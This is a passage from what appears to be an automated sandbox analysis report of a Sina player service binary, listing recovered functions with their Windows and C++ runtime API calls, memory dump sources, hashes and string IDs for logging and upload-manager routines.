                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00371A08
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAE_JPBD_J@Z.MSVCP120(?,?,00000000), ref: 00371A18
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00371A41
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHD@Z.MSVCP120(?), ref: 00371A4C
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?width@ios_base@std@@QAE_J_J@Z.MSVCP120(00000000,00000000), ref: 00371A85
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@J@Z.MSVCP120 ref: 00371FE1
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z.MSVCP120 ref: 00371FF2
                                                                                                                                                                                                    • ??6@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AAV01@PB_W@Z.BASE(00000000), ref: 00372002
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z.MSVCP120 ref: 0037200D
                                                                                                                                                                                                    • OutputDebugStringA.KERNEL32(00000000,?), ref: 0037202B
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?), ref: 0037203A
                                                                                                                                                                                                    • ??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP120 ref: 00372088
                                                                                                                                                                                                    • ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP120 ref: 00372094
                                                                                                                                                                                                    • ??1?$basic_ios@_WU?$char_traits@_W@std@@@std@@UAE@XZ.MSVCP120 ref: 0037209D
                                                                                                                                                                                                    • ?_Unlock@?$basic_streambuf@DU?$char_traits@D@std@@@std@@UAEXXZ.MSVCP120(0039D874,00000000), ref: 003720D7
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: U?$char_traits@$D@std@@@std@@$V01@V?$basic_streambuf@$?rdbuf@?$basic_ios@D@std@@@2@$??6?$basic_ostream@?width@ios_base@std@@$?sputc@?$basic_streambuf@U?$char_traits@_W@std@@@std@@$??0?$basic_ios@??0?$basic_iostream@??0?$basic_streambuf@??1?$basic_ios@_??1?$basic_iostream@??1?$basic_streambuf@??3@??6@?flags@ios_base@std@@?setstate@?$basic_ios@_?sputn@?$basic_streambuf@?uncaught_exception@std@@CountCurrentD@std@@@1@@DebugOsfx@?$basic_ostream@OutputStringThreadTickUnlock@?$basic_streambuf@V01@@V?$basic_ostream@
                                                                                                                                                                                                    • String ID: )#sinaliveupgrade#[$)- $ApnsHTTP.cpp$Contructor
                                                                                                                                                                                                    • API String ID: 2340524257-3196316403
                                                                                                                                                                                                    • Opcode ID: 7bffc24f69f6ba40dd22cf71970ed76bce195d0c5bd3abaabe73b95f9b9d3468
                                                                                                                                                                                                    • Instruction ID: 39bb2503c50abbf86e10e2ef55c3612571fa4ae7ac56cba0059d788a8a15911a
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7bffc24f69f6ba40dd22cf71970ed76bce195d0c5bd3abaabe73b95f9b9d3468
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 98616271900348DFDB22DFA4DD4AB9EBBB8FB04304F008999E45AA7291DB75A948CF51
                                                                                                                                                                                                    Function 0037AEC0 Relevance: 35.1, APIs: 16, Strings: 4, Instructions: 134threadCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP120 ref: 0037AF0C
                                                                                                                                                                                                    • ??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QAE@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z.MSVCP120(?,00000000), ref: 0037AF2F
                                                                                                                                                                                                    • ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP120 ref: 0037AF69
                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 0037AFA3
                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 0037AFC0
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?width@ios_base@std@@QBE_JXZ.MSVCP120(8285FFAB), ref: 00371937
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?width@ios_base@std@@QBE_JXZ.MSVCP120 ref: 0037194E
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?width@ios_base@std@@QBE_JXZ.MSVCP120 ref: 00371965
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QAEXH_N@Z.MSVCP120(00000004,00000000), ref: 00371AC5
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?uncaught_exception@std@@YA_NXZ.MSVCP120 ref: 00371AD2
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP120 ref: 00371ADF
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00371AEF
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00371B03
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z.MSVCP120 ref: 0037AFDD
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?flags@ios_base@std@@QBEHXZ.MSVCP120(?), ref: 003719B4
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 003719DE
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHD@Z.MSVCP120(?), ref: 003719E9
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00371A08
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAE_JPBD_J@Z.MSVCP120(?,?,00000000), ref: 00371A18
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00371A41
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHD@Z.MSVCP120(?), ref: 00371A4C
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?width@ios_base@std@@QAE_J_J@Z.MSVCP120(00000000,00000000), ref: 00371A85
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@J@Z.MSVCP120(?,?,?,?,?,?,?,6C6C56E0), ref: 0037B000
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z.MSVCP120(?,?,?,?,?,?,?,?,?,6C6C56E0), ref: 0037B011
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z.MSVCP120(?,?,?,?,?,?,?,?,?,?,?,?,?,6C6C56E0), ref: 0037B02B
                                                                                                                                                                                                    • OutputDebugStringA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C6C56E0), ref: 0037B049
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C6C56E0), ref: 0037B058
                                                                                                                                                                                                    • ??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP120 ref: 0037B0BB
                                                                                                                                                                                                    • ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP120 ref: 0037B0C7
                                                                                                                                                                                                    • ??1?$basic_ios@_WU?$char_traits@_W@std@@@std@@UAE@XZ.MSVCP120 ref: 0037B0D0
                                                                                                                                                                                                    • ?IsRunning@Thread@base@@QBE_NXZ.BASE ref: 0037B0D8
                                                                                                                                                                                                    • ?Start@Thread@base@@QAE_NXZ.BASE ref: 0037B0E4
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: U?$char_traits@$D@std@@@std@@$V?$basic_streambuf@$?rdbuf@?$basic_ios@D@std@@@2@V01@$??6?$basic_ostream@?width@ios_base@std@@$?sputc@?$basic_streambuf@Thread@base@@U?$char_traits@_W@std@@@std@@$??0?$basic_ios@??0?$basic_iostream@??0?$basic_streambuf@??1?$basic_ios@_??1?$basic_iostream@??1?$basic_streambuf@??3@?flags@ios_base@std@@?setstate@?$basic_ios@_?sputn@?$basic_streambuf@?uncaught_exception@std@@CountCurrentD@std@@@1@@DebugOsfx@?$basic_ostream@OutputRunning@Start@StringThreadTickV01@@
                                                                                                                                                                                                    • String ID: )#sinaclient#[$)- $UploadMgr::Start$upload_mgr.cpp
                                                                                                                                                                                                    • API String ID: 1930787510-1479475722
                                                                                                                                                                                                    • Opcode ID: 9c05521879995f3be869ef1dfa3e1195d40ba3353700c1414e3bdf71f6a3477b
                                                                                                                                                                                                    • Instruction ID: 5627d8a67b6da6cdfa49ef598a3801e3e7c8f865ab66810effb1c810e45e4edc
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9c05521879995f3be869ef1dfa3e1195d40ba3353700c1414e3bdf71f6a3477b
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 52515075900209DFDF22EFA4ED4ABDDBBB8FB14304F00459AE409A7291DB759A44CF61
                                                                                                                                                                                                    Function 0037A870 Relevance: 33.4, APIs: 15, Strings: 4, Instructions: 136threadCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP120(8285FFAB), ref: 0037A8C3
                                                                                                                                                                                                    • ??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QAE@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z.MSVCP120(?,00000000), ref: 0037A8E6
                                                                                                                                                                                                    • ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP120 ref: 0037A920
                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 0037A95D
                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 0037A97D
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?width@ios_base@std@@QBE_JXZ.MSVCP120(8285FFAB), ref: 00371937
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?width@ios_base@std@@QBE_JXZ.MSVCP120 ref: 0037194E
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?width@ios_base@std@@QBE_JXZ.MSVCP120 ref: 00371965
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QAEXH_N@Z.MSVCP120(00000004,00000000), ref: 00371AC5
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?uncaught_exception@std@@YA_NXZ.MSVCP120 ref: 00371AD2
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP120 ref: 00371ADF
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00371AEF
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00371B03
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z.MSVCP120 ref: 0037A99A
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?flags@ios_base@std@@QBEHXZ.MSVCP120(?), ref: 003719B4
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 003719DE
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHD@Z.MSVCP120(?), ref: 003719E9
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00371A08
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAE_JPBD_J@Z.MSVCP120(?,?,00000000), ref: 00371A18
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00371A41
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHD@Z.MSVCP120(?), ref: 00371A4C
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?width@ios_base@std@@QAE_J_J@Z.MSVCP120(00000000,00000000), ref: 00371A85
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@J@Z.MSVCP120 ref: 0037A9BD
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z.MSVCP120 ref: 0037A9CE
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@_N@Z.MSVCP120 ref: 0037A9E8
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z.MSVCP120 ref: 0037A9F0
                                                                                                                                                                                                    • OutputDebugStringA.KERNEL32(00000000,?), ref: 0037AA0E
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?), ref: 0037AA1D
                                                                                                                                                                                                    • ??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP120 ref: 0037AA80
                                                                                                                                                                                                    • ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP120 ref: 0037AA8C
                                                                                                                                                                                                    • ??1?$basic_ios@_WU?$char_traits@_W@std@@@std@@UAE@XZ.MSVCP120 ref: 0037AA95
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: U?$char_traits@$D@std@@@std@@$V?$basic_streambuf@$??6?$basic_ostream@?rdbuf@?$basic_ios@D@std@@@2@V01@$?width@ios_base@std@@$?sputc@?$basic_streambuf@U?$char_traits@_W@std@@@std@@$??0?$basic_ios@??0?$basic_iostream@??0?$basic_streambuf@??1?$basic_ios@_??1?$basic_iostream@??1?$basic_streambuf@??3@?flags@ios_base@std@@?setstate@?$basic_ios@_?sputn@?$basic_streambuf@?uncaught_exception@std@@CountCurrentD@std@@@1@@DebugOsfx@?$basic_ostream@OutputStringThreadTickV01@@V01@_
                                                                                                                                                                                                    • String ID: )#sinaclient#[$)- $SetShowDmpComplete show = $upload_mgr.cpp
                                                                                                                                                                                                    • API String ID: 3133238190-660511650
                                                                                                                                                                                                    • Opcode ID: 42ca20efa9e9602aef21212a9fc10c4e377770ae1cc82aa7ffd6eeffa8f7404f
                                                                                                                                                                                                    • Instruction ID: 507c115d80529d44689732cfcb5d68722b72e3baa4bd59ae15843fe9b469146c
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 42ca20efa9e9602aef21212a9fc10c4e377770ae1cc82aa7ffd6eeffa8f7404f
                                                                                                                                                                                                    • Instruction Fuzzy Hash: ED518171D002489FDF22DFA4DD4ABDDBBB8FB14344F00899AE40AA7291DB759A48CF51
                                                                                                                                                                                                    Function 6C574A40 Relevance: 33.2, APIs: 22, Instructions: 201registrytimeCOMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 6C574A47
                                                                                                                                                                                                    • Concurrency::SchedulerPolicy::SchedulerPolicy.LIBCMT(?,00000038,6C576A9C,6C5648CA,0000000C,6C573D89,0000000C,6C573E4B,?,00000000,?,6C573A7E,?,6C5648CA), ref: 6C574A62
                                                                                                                                                                                                      • Part of subcall function 6C576F6A: ??2@YAPAXI@Z.MSVCR120(00000028,00000180,?,6C574A67,?,00000038,6C576A9C,6C5648CA,0000000C,6C573D89,0000000C,6C573E4B,?,00000000,?,6C573A7E), ref: 6C576F72
                                                                                                                                                                                                      • Part of subcall function 6C576F6A: memcpy.MSVCR120(00000000,?,00000028,00000028,00000180,?,6C574A67,?,00000038,6C576A9C,6C5648CA,0000000C,6C573D89,0000000C,6C573E4B,?), ref: 6C576F81
                                                                                                                                                                                                      • Part of subcall function 6C57433D: ??_U@YAPAXI@Z.MSVCR120(00000000), ref: 6C574382
                                                                                                                                                                                                      • Part of subcall function 6C57433D: memset.MSVCR120(00000000,00000000,?,00000000), ref: 6C574392
                                                                                                                                                                                                      • Part of subcall function 6C57433D: ??2@YAPAXI@Z.MSVCR120(0000000C,00000000,00000000,?,00000000), ref: 6C574399
                                                                                                                                                                                                      • Part of subcall function 6C57433D: ??_U@YAPAXI@Z.MSVCR120(00000000,?,?,00000180,00000000,6C574A97), ref: 6C5743C3
                                                                                                                                                                                                      • Part of subcall function 6C57433D: InitializeSListHead.KERNEL32(?,?,?,00000180,00000000,6C574A97), ref: 6C5743D8
                                                                                                                                                                                                      • Part of subcall function 6C57433D: InitializeSListHead.KERNEL32(00000180,?,?,00000180,00000000,6C574A97), ref: 6C5743DE
                                                                                                                                                                                                      • Part of subcall function 6C5743FE: ??_U@YAPAXI@Z.MSVCR120(00000000), ref: 6C574443
                                                                                                                                                                                                      • Part of subcall function 6C5743FE: memset.MSVCR120(00000000,00000000,?,00000000), ref: 6C574453
                                                                                                                                                                                                      • Part of subcall function 6C5743FE: ??2@YAPAXI@Z.MSVCR120(0000000C,00000000,00000000,?,00000000), ref: 6C57445A
                                                                                                                                                                                                      • Part of subcall function 6C5743FE: ??_U@YAPAXI@Z.MSVCR120(00000000,?,?,00000180,00000000,6C574AC1), ref: 6C574484
                                                                                                                                                                                                      • Part of subcall function 6C5743FE: InitializeSListHead.KERNEL32(?,?,?,00000180,00000000,6C574AC1), ref: 6C574499
                                                                                                                                                                                                      • Part of subcall function 6C5743FE: InitializeSListHead.KERNEL32(?,?,?,00000180,00000000,6C574AC1), ref: 6C57449F
                                                                                                                                                                                                    • ??0_ReentrantBlockingLock@details@Concurrency@@QAE@XZ.MSVCR120(?,?,?,?,?,?,?,?,?,?,6C564938,000000FF), ref: 6C574AC7
                                                                                                                                                                                                      • Part of subcall function 6C575C29: __crtInitializeCriticalSectionEx.MSVCR120(?,00000000,00000180,6C574ACC,?,?,?,?,?,?,?,?,?,?,6C564938,000000FF), ref: 6C575C35
                                                                                                                                                                                                      • Part of subcall function 6C574A04: ??_U@YAPAXI@Z.MSVCR120(00000000,?,?,?,00000180,6C574B22), ref: 6C574A21
                                                                                                                                                                                                      • Part of subcall function 6C574A04: memset.MSVCR120(00000000,00000000,?,00000000,?,?,?,00000180,6C574B22), ref: 6C574A32
                                                                                                                                                                                                    • InitializeSListHead.KERNEL32(?), ref: 6C574BC6
                                                                                                                                                                                                    • InitializeSListHead.KERNEL32(?), ref: 6C574BCF
                                                                                                                                                                                                    • InitializeSListHead.KERNEL32(?), ref: 6C574BD8
                                                                                                                                                                                                    • InitializeSListHead.KERNEL32(?), ref: 6C574BE1
                                                                                                                                                                                                    • ?GetPolicyValue@SchedulerPolicy@Concurrency@@QBEIW4PolicyElementKey@2@@Z.MSVCR120(00000000), ref: 6C574BED
                                                                                                                                                                                                    • ?GetPolicyValue@SchedulerPolicy@Concurrency@@QBEIW4PolicyElementKey@2@@Z.MSVCR120(00000004,00000000), ref: 6C574BFA
                                                                                                                                                                                                    • ?GetPolicyValue@SchedulerPolicy@Concurrency@@QBEIW4PolicyElementKey@2@@Z.MSVCR120(00000007,00000004,00000000), ref: 6C574C08
                                                                                                                                                                                                      • Part of subcall function 6C5758DA: __EH_prolog3.LIBCMT ref: 6C5758E1
                                                                                                                                                                                                    • ?GetPolicyValue@SchedulerPolicy@Concurrency@@QBEIW4PolicyElementKey@2@@Z.MSVCR120(00000001,00000007,00000004,00000000), ref: 6C574C1C
                                                                                                                                                                                                    • ?GetPolicyValue@SchedulerPolicy@Concurrency@@QBEIW4PolicyElementKey@2@@Z.MSVCR120(00000001,00000001,00000007,00000004,00000000), ref: 6C5A2ED9
                                                                                                                                                                                                      • Part of subcall function 6C576F10: TlsAlloc.KERNEL32 ref: 6C576F16
                                                                                                                                                                                                      • Part of subcall function 6C573C0B: __crtCreateEventExW.MSVCR120(00000000,00000000,00000000,001F0002), ref: 6C573C1B
                                                                                                                                                                                                    • RegisterWaitForSingleObject.KERNEL32(?,00000000,6C5C39D0,?,000000FF,00000000), ref: 6C574C60
                                                                                                                                                                                                    • ?GetOSVersion@Concurrency@@YA?AW4OSVersion@IResourceManager@1@XZ.MSVCR120 ref: 6C574C6E
                                                                                                                                                                                                      • Part of subcall function 6C573E7E: __EH_prolog3.LIBCMT ref: 6C573E85
                                                                                                                                                                                                      • Part of subcall function 6C576FED: ___crtSetThreadpoolTimer.LIBCMT ref: 6C577032
                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 6C5A2EE3
                                                                                                                                                                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000), ref: 6C5A2EF9
                                                                                                                                                                                                    • _CxxThrowException.MSVCR120(?,6C62CF40,00000000), ref: 6C5A2F07
                                                                                                                                                                                                    • GetLastError.KERNEL32(?,6C62CF40,00000000), ref: 6C5A2F0C
                                                                                                                                                                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000), ref: 6C5A2F22
                                                                                                                                                                                                    • CreateTimerQueueTimer.KERNEL32(?,00000000,6C5C3192,?,7FFFFFFF,7FFFFFFF,00000000), ref: 6C5A2F46
                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 6C5A2F54
                                                                                                                                                                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000), ref: 6C5A2F6A
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3900717819.000000006C550000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901175506.000000006C62F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901245959.000000006C632000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901348341.000000006C635000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901444080.000000006C636000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901544582.000000006C637000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Policy$Initialize$HeadList$Concurrency@@Scheduler$ElementKey@2@@Policy@Value@$??2@Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorH_prolog3LastTimermemset$CreateVersion@__crt$??0_AllocBlockingConcurrency::CriticalEventExceptionLock@details@Manager@1@ObjectPolicy::QueueReentrantRegisterResourceSectionSingleThreadpoolThrowWait___crtmemcpy
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1785735614-0
                                                                                                                                                                                                    • Opcode ID: f6eb4c533dfa83e887d4e699264bc3dada3c32883abd1ef7a5a09f5ec25a54f3
                                                                                                                                                                                                    • Instruction ID: 6727d9db3822f11bbec131ef61bc9cb50c8e50896f23f2ae4b6c1ca73225c804
                                                                                                                                                                                                    • Opcode Fuzzy Hash: f6eb4c533dfa83e887d4e699264bc3dada3c32883abd1ef7a5a09f5ec25a54f3
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 72912DB0A01646FBD718DF7AC984AD9FBA8BF58304F50422ED42D97B40DB34A554CFA1
                                                                                                                                                                                                    Function 00398420 Relevance: 31.7, APIs: 16, Strings: 2, Instructions: 248COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ??0FilePath@base@@QAE@XZ.BASE(8285FFAB,6C6C2BA0,00000000,00000000), ref: 0039846E
                                                                                                                                                                                                      • Part of subcall function 0037F8A0: ?Get@PathService@@SA_NHPAVFilePath@base@@@Z.BASE(0000006E,?,8285FFAB), ref: 0037F8D1
                                                                                                                                                                                                      • Part of subcall function 0037F8A0: ?Append@FilePath@base@@QBE?AV12@ABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@@Z.BASE(?,?,Sina,Sina), ref: 0037F944
                                                                                                                                                                                                      • Part of subcall function 0037F8A0: ??4FilePath@base@@QAEAAV01@ABV01@@Z.BASE(00000000), ref: 0037F953
                                                                                                                                                                                                      • Part of subcall function 0037F8A0: ??1FilePath@base@@QAE@XZ.BASE ref: 0037F95C
                                                                                                                                                                                                      • Part of subcall function 0037F8A0: ??3@YAXPAX@Z.MSVCR120(?), ref: 0037F972
